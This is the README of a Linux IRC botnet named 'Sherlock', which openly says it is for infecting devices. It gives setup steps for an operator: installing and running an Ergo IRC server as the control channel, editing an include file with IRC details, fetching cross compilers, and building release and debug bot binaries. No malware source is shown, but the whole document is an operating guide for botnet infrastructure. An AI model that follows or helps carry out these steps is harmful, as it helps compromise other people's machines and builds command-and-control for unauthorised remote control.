#                              #
#                              #
#                              #
#     Sherlock IRC Botnet,     #
#       Written by Kuru.       #
#                              #
#       Change includes.h      #
#       to your IRC info       #
#                              #
#                              #
#                              #
# Note: This botnet is Linux based. You cannot infect PMA or other Windows devices.

##### Installing & Running Ergo IRC ####
make setup-packages

wget https://github.com/ergochat/ergo/releases/download/v2.11.1/ergo-2.11.1-linux-x86_64.tar.gz
tar xvf ergo-2.11.1-linux-x86_64.tar.gz
cd ergo-2.11.1-linux-x86_64
cp default.yaml ircd.yaml
nano ircd.yaml # Change to your needs
./ergo mkcerts
screen -S irc ./ergo run

#### Downloading cross compilers ####
make setup-crosscompilers

#### Building binaries ####
make build
For debug binary:
make debug
